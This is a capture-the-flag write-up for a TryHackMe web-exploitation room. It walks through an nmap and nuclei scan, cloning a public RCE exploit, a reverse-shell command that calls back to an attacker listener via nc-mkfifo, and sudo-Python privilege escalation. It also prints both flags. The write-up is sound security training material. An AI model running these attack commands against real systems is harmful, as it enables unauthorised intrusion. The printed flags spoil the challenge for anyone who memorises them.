Room Information
- Platform: TryHackMe
- Room: Corp Website
- Difficulty: Medium
- Category: Web Exploitation / Privilege Escalation
- Points: 200
Introduction:
The objective of this room was to investigate and exploit vulnerabilities present in the "Romance & Co" website environment. The challenge simulated the real world breach scenario, where incomplete logs, vulnerable services and weak priviledge environment let attackers, to compromise the target machine.
The goal was to:
- Enumerate the machine
- Discover Vulnerabilities
- Gain initial access
- Escalate Privileges
- Capture both user and root flags.
The write-up explains the complete approach I took from reconnaissance to obtaining root access to solve this challenge .
Initial Reconnaissance:
The first step includes the port scanning and enumeration using nmap.
nmap -sC -sV corp.thm -Pn
Explanation:
-sC→ Run default NSE scripts-sV→ Service version detection-Pn→ Treat host as online
At first, all the ports appeared filtered.
This indicates:
- A firewall may be active
- The web application may be running on a non-standard port
- Enumeration should continue using direct IP and known web ports
Vulnerability Scanning:
After the basic reconnaissance, I used nuclei to look for the known vulerabilities.
nuclei -u http://10.48.174.200:3000
The nuclei detected:
[CVE-2025–55184] [http] [high]
This was the major breakthrough.
The scan indicates the web application was vulnerable with remote code execution vulnerability.
Exploit Research:
After knowing the CVV, I searched for it online for the public exploit.
git clone https://github.com/Chocapikk/CVE-2025-55182.git
Then I entered the directory.
cd CVE-2025–55182
Setting Up Python Environment:
The exploit needed the python dependencies, so I created one for me.
python3 -m venv .venv
source .venv/bin/activate
Exploiting the Target:
Once the dependencies were installed successfully, I executed the exploit.
This confirms the successful Remote Code Execution on the target.
Reading user.txt:
I found the user flag at /home/daniel/user.txt.
THM{R34c7_2_5h311_3xpl017}
User flag captured successfully. The next objective was privilege escalation to root.
Privilege Escalation Enumeration:
During local enumeration, sudo -l revealed a dangerous sudo misconfiguration.
The user daniel could execute Python as root without a password.
Obtaining Reverse Shell:
To make privilege escalation easier, I created the reverse shell.
python3 exploit.py -u http://10.48.174.200:3000 -r -l 192.168.141.224 -p 4444 -P nc-mkfifo
The target connected back successfully.
Privilege Escalation to Root:
Since I got the shell and python could be executed as root, hence privilege escalation became straightforward.
Finally, I accessed the root flag, using command
cat /root/root.txt
root flag captured successfully.
THM{Pr1v_35c_47_175_f1n357}
Key Learnings:
This room demonstrated several important real-world security concepts:
1. Enumeration is Critical
Even when Nmap initially showed filtered ports, continuing enumeration led to discovering the vulnerable service.
2. Automated Scanning Helps
Tools like Nuclei can quickly identify known vulnerabilities and speed up the assessment process.
3. Public Exploits are Dangerous
Once a vulnerability becomes public, attackers can weaponize it rapidly.
4. Misconfigured Sudo Permissions
Allowing users to execute interpreters like Python as root without authentication is extremely dangerous.
5. Shell Stabilization Matters
Upgrading unstable reverse shells significantly improves post-exploitation workflow.
Conclusion:
The Corp Website room on TryHackMe was an excellent hands-on challenge that combined:
- Web exploitation
- Vulnerability assessment
- Remote Code Execution
- Reverse shells
- Linux privilege escalation
The room effectively demonstrated how a single vulnerable web application combined with poor privilege management can lead to complete system compromise.
This challenge was a great practical learning experience for understanding real-world attack chains and post-exploitation techniques.
Author
Ankit Bhardwaj